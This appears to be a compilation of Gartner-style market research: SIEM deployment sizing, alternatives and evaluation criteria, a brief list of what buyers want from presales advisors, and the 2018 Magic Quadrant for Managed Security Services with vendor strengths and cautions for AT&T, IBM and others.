The ongoing consideration of SIEM technology by companies with limited security resources results in demand for products that are easy to deploy and manage and that provide security monitoring content such as correlation rules, queries, dashboards, reports, threat feeds that support basic security monitoring and compliance reporting functions.

SIEM solutions should:

  • Support the real-time collection and analysis of events from host systems, security devices and network devices, combined with contextual information for threats, users, assets and data.
  • Provide long-term event and context data storage and analytics.
  • Provide predefined functions that can be lightly customized to meet company-specific requirements.
  • Be as easy as possible to deploy and maintain.

Scalability

Scalability is a major consideration in SIEM deployments. For a SIEM technology to meet the requirements for a given deployment, it must be able to collect, process, normalize, store and analyze all security-relevant events and other context-relevant data. Minimal latency is necessary for real-time correlation and alerting. Event processing includes parsing, filtering, aggregation, correlation, enrichment, alerting, display, indexing and writing to the data store. Scalability also includes access to the data for analytics and reporting — even during peak event periods — with ad hoc query response times that enable an iterative approach for incident investigation. Behavioral and analytics require the collection and analysis of data over longer time periods than typically used for real-time alerting. We characterize the size of a deployment based on three principal factors:

  • The number of event sources
  • The sustained events collected per second
  • The size of the event data store

We assume a mix of event sources that are dominated by servers, but also include firewalls, intrusion detection sensors and network devices. The boundaries for small, midsize and large deployments are not absolute, because some deployments may have a large number of relatively quiet event sources, while others will have a smaller number of very busy event sources. For example, a deployment with several busy log sources may exceed the EPS boundary for a small deployment, but will still be small architecturally.

Gartner defines a small deployment as one with 300 or fewer event sources, a sustained EPS rate of 1,500 EPS or less, and a back store sized at 800GB or less. Gartner defines a midsize deployment as one with 400 to 800 event sources, a sustained event rate of 2,000 to 7,000 EPS and a back store of 4TB to 8TB. A large deployment is defined as one with more than 900 event sources, a sustained event rate of more than 15,000 EPS, and a back store of 10TB or more. Some very large deployments have many thousands of event sources, sustained event rates of more than 25,000 EPS and a back store of more than 50TB. We may indicate that a vendor’s SIEM technology is better-suited for a small, midsize or large deployment, which means that the size is a typical or most common successful deployment for that vendor. Every vendor will have outliers.

SIEM Services

Gartner customers increasingly indicate that they are seeking external service support for their SIEM deployment, or are planning to acquire that support in conjunction with an SIEM product (see “How and When to Use Co-managed SIEM” ). Motivation to seek external services includes lack of internal resources to manage a SIEM deployment, lack of resources to perform real-time alert monitoring or lack of expertise to expand the deployment to include new use cases (such as those for advanced threat detection). We expect that demand by SIEM users for such services will grow, driven by more customers adopting 24/7 monitoring requirements and implementing use cases that require deeper SIEM operational and analytics expertise.

SIEM vendors may support these needs via managed services with their own staff or outsourcing services, or using partners. SIEM offered as a service includes the maintenance of the platform by the vendor, with customers using their own resources (or other service providers) to configure content and monitor and investigate events. Managed security service providers, which offer real-time monitoring and analysis of events, and collect logs for reporting and investigation, are another option for SIEM users. (see “Innovation Insight for SIEM as a Service” ). For basic use cases, severely resource-constrained customers may opt for SaaS-type log management services from Loggly, Sumo Logic or others that have some security utility, but also cover operational use cases. Customer-specific requirements for event collection and storage, alerting, investigation, and reporting may prove problematic for external service providers, and SIEM users exploring services should evaluate the fit of the service provider to meet current and planned use cases.

SIEM Alternatives

The complexity and cost of SIEM, as well as emerging security analytics technologies, have driven interest in alternative approaches to collecting and analyzing event data to identify advanced attacks. The combination of Elasticsearch, Logstash and Kibana (also known as the ELK stack or Elastic Stack); Apache Spot; Apache Metron; and other tools leveraged with or natively using big data platforms like Hadoop offer data collection, management and analytics capabilities. Organizations with sufficient resources to deploy and manage these, and develop and maintain analytics to address security use cases, may be able to get a solution that addresses a sufficient number of their requirements for a lower cost compared with commercial technologies. Gartner continues to track the development of this approach, and there is some feedback from customers that the workload involved in engineering these solutions to scale and the development effort to support the required event sources and analysis is significant, despite the software itself being free. This may negate the objective of being less expensive than a commercial SIEM deployment .

Organizations that lack the resources and process maturity for SIEM deployment and support, and that cannot or choose not to engage an MSSP for monitoring, can meet basic logging and review requirements with log management technologies (or services) such as Graylog or Sumo Logic with no, or very limited, security use cases supported out of the box (see “Use Central Log Management for Security Event Monitoring Use Cases” ).

There are a number of providers offering managed detection and response (MDR) services that differ from those of MSSPs, with the goal of identifying and responding to advanced threats in the customer environment — typically through the analysis of selected network and endpoint data (see “Market Guide for Managed Detection and Response Services” ). The scope of services and event sources is typically smaller than those available from an MSSP, or covered by a SIEM deployment. As such, they do not typically compete directly against the SIEM vendor or MSSP, where customers have broader use-case requirements. However, the MDR services claim effective advanced threat detection capabilities, and may compete for SIEM budget in organizations with sufficient resources to support those use cases. Gartner will continue to monitor the space to assess how MSS, MDR, logging and SIEM interact and intersect.

Evidence

Sources of information to support this analysis include feedback from Gartner customers gathered through inquiry calls, face-to-face meetings and survey/polling tools; vendor information supplied in response to a survey, product demonstration and briefings; and vendor reference opinions gathered via polling tool.

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market

What buyers want from Trusted Advisor. (that is not you sales person, its the presales guy)

What buyers want from Trusted Advisor. (that is not you sales person, its the presales guy)

  1. Educate me with new ideas or perspectives
  2. Collaborated with me
  3. Persuaded me we would achieve results
  4. Listened to me
  5. Understood my needs
  6. Helped me avoid potential pitfalls
  7. Crafted a compelling solution
  8. Depicted purchasing process accurately
  9. Connected with me personlly
  10. Overall value from the company is superior to other options

Magic Quadrant for Managed Security Services, Worldwide

Magic Quadrant for Managed Security Services, Worldwide

 

Published: 27 February 2018 ID: G00325535

Analyst(s):

 

Summary

Security and risk management leaders interested in managed security services for threat detection, security technology management and compliance concerns should use this Magic Quadrant to help identify and evaluate providers with the ability to deliver services globally.

Market Definition/Description

Gartner defines managed security services (MSSs) as “the remote monitoring of security events and security-related data sources, or the management of IT security technology along with security event monitoring, delivered via shared services from remote security operations centers (SOCs), not through personnel on-site nor remote services delivered on a one-one basis to a single customer.”

Managed security service providers’ (MSSPs’) portfolios typically include the following services:

  • Security event monitoring only, or security event monitoring along with device/agent monitoring and management, primarily in the following categories:
    • Firewalls
    • Network-based threat detection technologies, such as network intrusion detection/prevention systems (IDPS)
    • Multifunction firewalls, or unified threat management (UTM) technology
    • Security gateways for messaging or web traffic
    • Web application firewalls
    • Endpoint protection platforms (EPPs), host intrusion detection/prevention systems (HIDS/HIPS) and endpoint detection and response (EDR)
  • Security analysis and reporting of events collected from IT infrastructure and application logs
  • Reporting for service management, regulatory compliance requirements and threat detection purposes
  • Management and monitoring, or monitoring only of advanced threat defense technologies, or the provision of those capabilities as a service
  • Vulnerability scanning delivered as a service
  • Management and monitoring of customer-deployed security information and event management (SIEM) technologies
  • Incident response services (both remote and on-site)

Services, such as the ones listed below, may also be part of MSS offerings, but are not common across all providers:

  • Distributed denial of service (DDoS) protection
  • Advanced threat intelligence services (e.g., dark web monitoring)
  • Secure messaging gateways, secure web gateways and web application firewalls delivered “as a service”
  • Managed vulnerability management (e.g., end-to-end management that includes scanning, prioritization and patching on behalf of the customer)
  • Identity and access management

This Magic Quadrant evaluation primarily focuses on the services for monitored, and managed and monitored, network security devices, host-based agents, and log event analysis and reporting services for other sources required by the buyer. These functions make up the core of MSS procurements.

There are no vendors appearing in the Visionaries quadrant of this Magic Quadrant. MSS is a mature market with a core set of services that appear in most MSS engagements.

Magic Quadrant

Figure 1. Magic Quadrant for Managed Security Services, Worldwide

Research image courtesy of Gartner, Inc.

Source: Gartner (February 2018)

Vendor Strengths and Cautions

AT&T

AT&T is a global telecommunications and IT services provider that offers a range of security device management and monitoring services for large enterprises, midsize businesses and governments. Headquartered in the U.S. (Dallas), and with regional offices in the U.K. (London) and Hong Kong, AT&T delivers services from five 24/7 SOCs (one Europe-based, one Asia/Pacific-based and three U.S.-based) and three SOCs operating local business hours (one in the Asia/Pacific region, one in Brazil and another in Europe). Customers served by an SOC operating local business hours and seeking after-hours support are routed to a 24/7 location with local language support. AT&T Threat Manager is its security event monitoring and management service, which is priced by events per day (EPD). Threat correlation and analysis is performed via the AT&T Threat Intellect platform, which leverages both commercial SIEM technologies and big data technologies and analytics, and is delivered to customers as part of AT&T’s Threat Management and Intelligence solutions. Device management is available through discrete managed security offerings for network security, data and application security, and mobile and endpoint security. Device management and workflow is handled through the AT&T Business Center portal, which also provides access to the Threat Manager view. The vendor offers threat intelligence via the AT&T Internet Protect service. AT&T supports in-country/customer premises data management in all regions, and can use local partners for device management to meet data residency requirements.

AT&T should be considered by organizations with a preference for services to be sourced from a single supplier, particularly managed network services and IT infrastructure security controls that need to be deployed, managed and monitored across the customer’s environment (both on-premises and cloud services) and the provider’s environment.

STRENGTHS
  • AT&T provides a wide scope of security-focused managed and monitoring services, with a strength in network-based security solutions. The security portfolio complements its managed network infrastructure and service offerings.
  • AT&T provides an integrated business portal where customers can access a variety of services, including accessing the Threat Manager portal along with portals for device management and vulnerability management services. The Threat Manager portal provides a strong user experience for both analysts and management personas, including customized dashboards, a risk trend feature and case management.
  • AT&T has moderate visibility with Gartner clients considering discrete MSSs.
CAUTIONS
  • AT&T provides support for Amazon Web Services (AWS) environment monitoring, but lacks support for Microsoft Azure and a limited set of SaaS providers (e.g., Office 365, Box and Salesforce are supported). Cloud access security broker (CASB) support is limited to SkyHigh Networks. Buyers should confirm support for their preferred SaaS vendors and other CASB vendors.
  • Customers wanting to leverage advanced threat detection technologies should confirm AT&T’s ability to monitor, and manage, preferred solutions as required, through either standard or custom delivery. AT&T has introduced a network-based forensic service that is only available to U.S. customers at this time due to data privacy restrictions. Customers outside the U.S. that are interested in this service should confirm future availability.
  • AT&T’s MSS business is most visible in the North American market, with lower visibility in Europe and little in the Asia/Pacific market. Buyers requiring a strong presence in the Asia/Pacific region should closely evaluate AT&T’s coverage there.

Atos

Atos is a global IT, digital service and software company with headquarters near Paris and regional offices in the U.S. (Purchase, New York) and Singapore. In addition to the vendor’s MSSs under the Cyber Security Services business, Atos provides a wide range of consulting, system integration, managed IT services and other offerings. Atos’ MSSs are delivered through a network of 14 24/7 SOCs (three in the U.K., six in continental Europe, two in the U.S., two in India and one in Malaysia). Atos recently acquired Anthelio Healthcare Solutions, providing capabilities in the Internet of Things (IoT)/OT space for managing privacy and compliance risks in the North American market. Atos provides threat intelligence and vulnerability notifications to customers using tools and services from partners like McAfee and Tripwire. Atos offers incident response and remediation activities as part of its core services in the form of forensic analysis and custom malware analysis, as well as offering optional threat hunting services and EDR leveraging CrowdStrike, for example. Advanced threat detection and monitoring services are available as part of Atos’ Prescriptive Security SOC offering, which leverages Atos’ proprietary big data analytics solution (Atos Codex) as well as technologies like user and entity behavior analytics (UEBA). In addition, IT/OT/IoT SOC services are developed and delivered together with Siemens.

Atos’ existing IT services customers and European-headquartered organizations with global coverage requirements that want a provider that can deliver end-to-end security management and monitoring services should consider the vendor for MSSs.

STRENGTHS
  • Customers requiring advanced analytics capabilities can opt for Atos’ flexible options leveraging Atos Codex, leading UEBA technologies or both.
  • Atos has a range of experience in securing transformational digital business projects within large enterprises, driven by its wider range of IT services engagements.
  • Atos supports customers that require end-to-end security management, monitoring and response, and offers standardized and customized solutions.
  • Atos partners with leading security technology vendors in areas such as network traffic analytics, endpoint protection, EDR, DDoS mitigation and encryption.
CAUTIONS
  • Atos Codex is currently only available to customers that opt for a dedicated McAfee SIEM platform. Atos indicates that adding Codex to the shared platform is on its roadmap. Customers that plan to leverage their shared SIEM platform and want advanced analytics capabilities should confirm availability.
  • Atos’ MSS portal is oriented toward reporting and dashboards to communicate information to customers, and provides limited support for bidirectional customer interaction.
  • Atos can monitor SaaS vendors supported within the McAfee Enterprise Security Manager (ESM) solution. Buyers should confirm support for monitoring of their preferred SaaS vendors and CASB solutions.
  • Atos is rarely mentioned by Gartner clients interested in stand-alone MSS engagements.

BAE Systems

BAE Systems, headquartered in Farnborough, U.K., offers a range of products and services in areas such as national defense, financial services and cybersecurity to industry and governments. The MSS group is headquartered in Guildford, U.K., with key offices in New York City, Dubai, Singapore and Sydney. Its offerings include Security Event Monitoring (SEM), Complete Security Monitoring (CSM), Managed Detection and Response (MDR), and Security Device Management (SDM). Services are delivered using five 24/7 SOCs — one in the U.K., three in the U.S. and one in the Philippines. Data residency requirements are typically met by retaining data locally and in geospecific cloud infrastructure. In the Asia/Pacific region, a local partner delivers services and cloud storage is not yet available. The BAE analytics platform uses a combination of commercial SIEM technologies and a big data and analytics, Hadoop-based platform. BAE supports common IaaS and security-as-a-service vendors such as Amazon CloudFront, AWS CloudTrail, Symantec.cloud, Cisco ScanSafe and Proofpoint. On-site and remote incident and breach response services are available via retainer.

BAE Systems has a customer base in EMEA of large enterprise businesses, primarily leveraging its CSM and MDR services, and a large small or midsize business (SMB) customer base in North America, primarily leveraging its NSM and SDM services. The vendor delivers its MSS offering using a combination of proprietary and commercial solutions, depending on the customer’s region and based on data privacy or residency requirements.

Companies in the financial services, legal, healthcare, media, critical infrastructure and defense markets that need a range of security monitoring, device management and advanced threat defense solutions should consider BAE Systems.

STRENGTHS
  • Advanced detection capabilities are supported by proprietary BAE Systems technology with its passive Network Probe Sensor and EDR agent. Customers that have not deployed commercial technologies for these functions can have these capabilities provided as a service.
  • BAE Systems’ MSS is augmented by a range of incident response services, including response and threat containment capabilities that are built into the MSS relationship, retainer-based response contracts, and incident response program development services.
  • Customer marks on BAE Systems’ threat detection capabilities are above average.
CAUTIONS
  • Most BAE Systems customers are in North America, with a small number in the Europe and Asia/Pacific regions. In the Asia/Pacific region, a partner delivers services for customers that require local data storage. Prospective customers with data residence or service delivery requirements specific to the Asia/Pacific region should validate the availability of services from BAE Systems.
  • The MSS portal offers limited reporting capabilities and management of vulnerability scans comparted to those of leading competitors. Threat intelligence is provided through a separate portal.
  • SaaS monitoring is limited to Office 365. There are no MSS integrations with CASB solutions. BAE Systems indicates that support for CASB vendors is on its roadmap.

BT

BT is headquartered in London with key offices globally, including London, Hong Kong and Dallas. BT has six European SOCs and four Asia/Pacific region SOCs providing 24/7 service, with an additional four non-24/7 SOCs worldwide. BT provides a range of telecommunications, cloud-enabled hosting, cloud brokering and integration, and collaboration services, in addition to managed security services. BT’s MSS offerings have been under the BT Security brand name since 1Q17. BT Security’s MSS portfolio includes a range of offerings primarily within the Managed Security Services and Security Intelligence portfolios. Security Intelligence includes services such as Security Log Management (SLM), Security Threat Monitoring (STM), Cyber Security and Security Threat Intelligence. Technology management is under Managed Security Services and includes managed firewalls, DDoS, web, email, PKI and cloud security. Additional offerings include Security Vulnerability Scanning (SVS) for managed vulnerability scanning and Managed SIEM for McAfee ESM, LogRhythm and IBM QRadar customers. BT’s strategy for managed security services is evolving to emphasize its Managed SIEM and Cyber Security Platform offerings for existing BT customers and global enterprise buyers that require more one-to-one-oriented services, as opposed to delivery using a shared analytics platform that this research primarily assesses. BT has two separate portals for security technology management (Security Hub) and monitoring services (Security Threat Monitoring), which BT has been revamping over the last 12 months. Consulting services are available to meet a variety of customer demands. Incident response support, available as a retainer, is delivered in partnership with FireEye-Mandiant and other firms. BT can meet requirements for data residency with in-region/in-country service provision and citizenship requirements for SOC staff.

Global enterprises seeking global MSS capabilities to satisfy complex security requirements should consider BT.

STRENGTHS
  • BT can support customers that require integrated cloud services (hosting and/or brokering) and MSSs, especially security threat monitoring.
  • BT has many partnerships with security technology and service vendors that are leveraged to provide broad support for device management, as well as threat monitoring services. Customers requiring custom solutions will also benefit from these partnerships.
  • Customers give BT above-average marks for overall service satisfaction.
CAUTIONS
  • BT’s efforts to upgrade its portal have resulted in incremental improvements, with further enhancements planned. Customer self-service options in these portals for basic functions, like account management, ticket ownership and management, and interacting with SOC staff, are very limited compared to competitors.
  • BT’s own big data technology and advanced analytics capabilities are currently limited to buyers purchasing its Cyber Security Platform (CSP), which can be delivered as a stand-alone on-premises or hosted solution. BT indicates elements of CSP are on the roadmap to be extended to other BT Security services, such as STM.
  • BT has low visibility with Gartner clients for stand-alone MSS deals. MSSs are commonly bundled with larger networking, cloud services and cybersecurity (e.g., on-premises SOC build-outs) initiatives with BT.

Capgemini

Capgemini, with headquarters in Paris and regional offices located in North America, Europe and the Asia/Pacific region, provides MSS as part of its Cybersecurity Services business. Capgemini delivers services from seven 24/7 SOCs located in India (Mumbai and Bangalore), and regional SOCs in Luxembourg; Toulouse, France; Madrid; and Inverness, Scotland, for customers with data residency and sovereignty requirements. There is one non-24/7 SOC in India. Capgemini provides a variety of MSSs. Log management and security event monitoring are supported via its shared QRadar SIEM solution, with flexible options for dedicated QRadar instances. Support for five SIEM solutions (Huntsman Enterprise SIEM, Micro Focus ArcSight, McAfee ESM, RSA NetWitness and Splunk) based on customer preference or for customers wanting management of their existing SIEM tool. Customer access to services is via the MSS Portal, which provides a basic dashboard, case management and reporting-oriented interface to the services provided to customers. Capgemini provides a tiered service approach (Bronze, Silver and Gold) to MSS buyers based on level of services and support required. Additional services include management and monitoring for vulnerability scanners, firewalls, endpoint protection, NIDS/NIPS, web application firewalls (WAFs), CASB, and data loss prevention. Additional services are available that cover consulting and advisory, identity and access management, and DDoS, among others.

MSS buyers looking for flexible options for SIEM tools and a wide portfolio of device management and security monitoring services, as well as existing Capgemini customers, should consider Capgemini for MSS.

STRENGTHS
  • Capgemini offers support for a wide variety of SIEM solutions, as well as other security technologies.
  • Capgemini leverages its own threat intelligence network for gathering intelligence to complement third-party commercial sources, which is utilized by its SOC and visible to customers.
  • There is local and regional data residency and sovereignty support for European customers via dedicated local SOCs and data centers.
  • Capgemini offers specific consulting and security monitoring services tailored to customers with ICS/SCADA and IoT environments.
CAUTIONS
  • Capgemini’s portal lags competitors as its focus is on service visibility, management and reporting. Features like log searching and compliance reporting are not yet supported. Capgemini is actively adding enhancements to the portal, and has recently introduced support for multifactor authentication, a chat function with SOC staff and the ability to import vulnerability scanner data.
  • North American and Australian customers requiring that services be delivered domestically should confirm plans for future expansion of SOCs in those regions.
  • Capgemini has limited visibility with Gartner clients for MSS-specific deals. Capgemini’s MSS deals are often included as part of end-to-end cybersecurity outsourcing or digital transformation initiatives.

CenturyLink

CenturyLink is based in Monroe, Louisiana, and has regional offices in Singapore and London. On 1 November 2017, CenturyLink completed the acquisition of Level 3 Communications, expanding its global presence and security service portfolio. CenturyLink provides telecommunications and public and private cloud services, in addition to MSSs. MSS can be acquired as a stand-alone service or as an add-on to other CenturyLink services. With the acquisition of Level 3, CenturyLink now has more than five 24/7 SOCs operating on four continents, including North America, Europe (London), Asia/Pacific (Singapore) and Latin America (Buenos Aires, Argentina, and Sao Paulo, Brazil). There are dedicated North American and U.K. SOCs to support national government contracts. CenturyLink provides a full scope of monitoring and management activities across a broad spectrum of security platforms, including next-gen firewalls, UTM systems, network and host IPS, WAF, VPN, EPP, email and web security, vulnerability scanning, threat intelligence services (from both legacy CenturyLink and Level 3), and advanced threat-oriented capabilities (e.g., network customer traffic analyzed against threat intelligence and advanced analytics for behavioral anomalies). CenturyLink uses a combination of proprietary implementations of big data platforms and other tools (such as from its previous acquisition of Cognilytics) and commercial products to collect, store and analyze customer log data and manage workflow. There are several service tiers available, from basic endpoint security management to advanced threat-oriented capabilities. Incident response, including on-site breach response services, is available with a retainer fee. Some data residency and staff citizenship requirements can be met with in-region SOCs and data storage. The pricing model for MSS depends on the services taken and includes set monthly recurring or usage-based fees; for example, threat monitoring is based on GB-per-day data.

Existing network services, infrastructure as a service (IaaS) and cloud service customers, as well as organizations with global service requirements, should consider CenturyLink for MSSs.

STRENGTHS
  • The MSS portal, which continues to see ongoing enhancements, provides fine-grained role mapping and access for users, and provides easy-to-use report creation and customization features.
  • CenturyLink offers several options for storing customer log data ranging from customer premises to regional CenturyLink data centers to commercial or CenturyLink cloud infrastructure.
  • CenturyLink’s expansion of its global SOC presence, which also increased with the acquisition of Level 3, now offers customers a local presence in four continents.
  • Customers give CenturyLink good marks for the ability to detect threats, and would generally recommend the service to other buyers.
CAUTIONS
  • All managed services are available across the globe, except for services leveraging EDR and endpoint forensic tools, which may be limited to specific tools depending on the customer’s geography. Advanced threat detection and forensics capability based on packet capture and analysis is not yet available, but is planned for 2018. Organizations seeking support for these tools, particularly use of EDR tools outside of the U.S., should validate timing and support availability with CenturyLink.
  • CenturyLink has made enhancements to its portal over the last 12 months, but the portal still has limited features for capturing and using assets and their business value, and does not currently support integrations to enable managing vulnerability scans or viewing scan results.
  • CenturyLink has low visibility with Gartner clients for stand-alone MSS deals. CenturyLink’s current focus is selling MSSs to existing enterprise customers, although it does sell discrete MSSs to non-CenturyLink customers.

DXC Technology

DXC Technology, a newly formed entity as the result of the merger of CSC and Hewlett Packard Enterprise’s (HPE’s) Enterprise Services business, is headquartered in Tysons, Virginia. The merger formally concluded in March 2017. The vendor has 16 SOCs across the Americas, EMEA and the Asia/Pacific region. DXC offers a range of security implementation and consulting services other than MSSs for enterprise and government customers. In addition to security monitoring and device management, DXC does offer additional standard managed services like managed SIEM, managed EDR, vulnerability assessment and DDoS protection, among others. The vendor differs from many other MSSPs in that it offers a range of managed services around identity and access management, such as Identity Management as a Service and Privileged Account Management. As an MSS provider, DXC is currently in a state of consolidation and change, in terms of both the technology platforms used for MSS delivery and new services that the provider is planning to introduce.

Customers requiring globally delivered MSS, especially those looking for a partner that also offers additional IT and security services, should consider DXC for MSSs.

STRENGTHS
  • DXC has a large revenue and incumbent base of security service customers, and has the ability to support large enterprise engagements across geographies.
  • DXC has a large partner network for security technologies and a strong portfolio of supported technologies, in addition to an extensive set of security-related service offerings.
  • DXC can support customers with hybrid cloud environments that require security monitoring and management services.
CAUTIONS
  • Postmerger of HPE’s Enterprise Services business and CSC, DXC still continues to support two separate portals for its MSS customers. Several key portal elements are in a basic stage or still in the process of being introduced to the customer portals (asset management, multilanguage support, reporting, etc.). A focus on log storage and search capabilities using big data technologies is currently being deployed globally.
  • Due to the merger, DXC has 16 SOCs across the world today, with a stated intention to consolidate the number of SOCs with the same local areas. Customers and prospects should carefully investigate the impact of this planned consolidation on the delivery of their service.
  • DXC, particularly as a new brand, rarely shows up on Gartner client shortlists for pure-play MSS deals.

Fujitsu

Fujitsu is headquartered in Tokyo, with key offices in London; Munich; Lisbon; Richardson, Texas; and Sunnyvale, California. Fujitsu has a large operational presence in Europe and Japan, with 24/7 SOCs in Japan (nine total), Australia, Singapore, India, Germany, the U.K., Finland and the U.S. Fujitsu’s security portal is primarily based on its underlying delivery platform based on LogRhythm’s SIEM solution. Fujitsu has an in-house Cyber Threat Intelligence (CTI) capability, which leverages a range of commercial and open-source feeds and partnerships with third parties, that underpins the threat analytics and detection capabilities within its MSSs. The CTI capability is also delivered as a stand-alone offering. Incident response support and consultancy is available as a retainer. Advanced threat detection capabilities for endpoint and networks, as well as sandboxing, leverage technology from partners such as FireEye, Check Point Software Technologies, McAfee, Symantec and others. Malware analysis is available on a range of commercial and open-source toolsets, and forensic analysis is delivered via Fujitsu consulting and partners as needed.

Buyers, including existing Fujitsu IT services customers, should consider Fujitsu for MSSs if they are looking for a provider that offers flexibility for service delivery, or if they already have IT services that can be easily integrated and would benefit from security enhancements.

STRENGTHS
  • Fujitsu provides managed services across a wide portfolio of technologies, including firewalls, UTM, endpoint protection and encryption, IDS/IPS, WAFs, VPN and remote access services, email security, data loss prevention, and identity and access management, in addition to its CTI, threat analytics and advanced threat detection offerings.
  • Fujitsu’s reach in the Asia/Pacific region and Europe is strong.
  • Fujitsu leverages leading SIEM technologies to deliver its security event monitoring and threat analytics and detection capabilities.
CAUTIONS
  • Fujitsu’s technology integrations, partnerships and service delivery methodology for MSS are less mature compared to competing vendors.
  • Fujitsu’s security portal is based purely on access to its LogRhythm platform. Service management functionality, including ticket management, customer communications and management dashboards, lags behind competitors.
  • Fujitsu has very low visibility with Gartner clients looking for discrete MSSs.

HCL Technologies

HCL Technologies is a global IT services provider that offers a range of IT and security services aimed at buyers, primarily through broad-scope IT outsourcing engagements. HCL is headquartered in Noida, India (with regional headquarters in London and Sunnyvale, California). MSS is a part of HCL’s Cybersecurity and GRC services provided via six 24/7 MSS SOCs worldwide (four in India, and one each in Europe and the U.S.). MSS is delivered using commercially available SIEM technologies (IBM QRadar, Micro Focus ArcSight, RSA NetWitness and Splunk), chosen in consultation with the customer. SIEM solutions are leveraged for log collection and management, and real-time security event monitoring and analysis. HCL also offers dedicated managed SIEM options. The vendor provides managed EDR, with multiple technology options available to customers, in addition to threat hunting services. SecIntAl is HCL’s branding for its big-data-based security analytics and threat intelligence capability that underpins the analytics for its threat monitoring services.

HCL’s portal provides a single dashboard-oriented interface across all supported SIEM tools, vulnerability management, endpoint management and CMDB services. Dedicated views in the portal support both analysts and leader personas. HCL supports a variety of third-party security technologies. In addition to firewalls, IDPSs and secure web gateways (SWGs), it also supports a variety of solutions like EDR, CASB, network traffic analysis (NTA) and vulnerability management. Related services, like incident and breach response, are provided by select partners.

Organizations engaged in IT outsourcing and technology transformation projects, buyers looking for providers to use their preferred SIEM tool and broad-based support for security technologies, and existing HCL Technologies customers should consider HCL for MSSs.

STRENGTHS
  • MSS customers can leverage HCL’s support for security technologies across a wide range of markets for product procurement, implementation and management. HCL’s MSS delivery approach is customizable to customers’ requirements and existing security technology solutions.
  • HCL offers a lot of flexibility for buyers with broad and complex security monitoring and management requirements across on-premises, SaaS, IaaS and PaaS environments.
  • Customers generally give HCL above-average marks across acquisition, implementation and overall services.
CAUTIONS
  • HCL Technologies’ portal is mainly focused only on service visibility through predefined dashboards and reports. Search functionality has been enhanced in the last 12 months, but is limited to 30 days of online data by default.
  • Customers looking for a turnkey security event monitoring service leveraging a shared delivery platform (e.g., no preference for an SIEM solution or bringing their own SIEM tool) should confirm with the vendor which SIEM solution will be used for the service and whether it meets buyers’ requirements and supports existing technologies (security and IT log event sources).
  • HCL Technologies is rarely mentioned in Gartner client inquiries for discrete MSSs as most HCL customers procure MSSs in conjunction with other outsourcing initiatives.

IBM

IBM is headquartered in Armonk, New York, with MSS offices in the U.S. (Atlanta and Cambridge, Massachusetts); London; Brussels; and Hortolandia, Brazil. IBM offers a broad range of MSSs, security consulting and incident response, either as stand-alone offerings or as part of larger IT services and outsourcing engagements. MSSs are delivered from five 24/7 SOCs, called X-Force Command Centers: one in the U.S.; one in San Jose, Costa Rica; one in Hortolandia, Brazil; one in Tokyo and one in Wroclaw, Poland. IBM has three additional non-24/7 SOCs in India, Belgium and the U.S. IBM uses its QRadar SIEM solution to deliver unified monitoring across MSS, regardless of the location of the QRadar platform — shared multitenant, on-premises or as a service. There are four MSS tiers available, ranging from basic endpoint security to highly customized services. IBM’s advanced analytics and targeted attack detection capabilities for the network and hosts include support for customer-deployed products, IBM products (e.g., QRadar modules) and strategic partner solutions (e.g., Carbon Black for IBM Security’s Managed Detection and Response service). Threat intelligence and incident response services, as well as security consulting services, are available. Support for data residency requirements is available through European Commission Model Clauses contract language, local data centers in the customer’s region supported by EU staff out of the Poland SOC, and use of on-premises QRadar SIEM or using SIEM as a service hosted within IBM Cloud within region.

Large enterprises with global service delivery requirements looking for flexible security event monitoring technology options, and those with strategic relationships with IBM, should consider IBM for MSSs.

STRENGTHS
  • IBM’s “QRadar Anywhere” approach provides flexible options for IBM QRadar SIEM customers that require managed SIEM options. Customers can migrate from the shared MSS platform to co-managed on-premises or QRadar on Cloud, or vice versa, as strategies evolve.
  • IBM MSS delivery is supported by a range of strong threat intelligence partners, including IBM’s X-Force Security Research, third-party commercial sources and data collected via the vendor’s in-house incident response services.
  • IBM has moderate visibility with Gartner clients considering MSSs. IBM’s visibility for co-managed SIEM opportunities, however, is growing in favor of discrete MSSs.
CAUTIONS
  • Customers report the IBM sales process is uneven in its ability to engage with them effectively, such as the lack of responses to RFPs. Customers also report mixed satisfaction with IBM’s delivery of MSS services. Marks are lower than competitors in areas like overall service capabilities and overall experience.
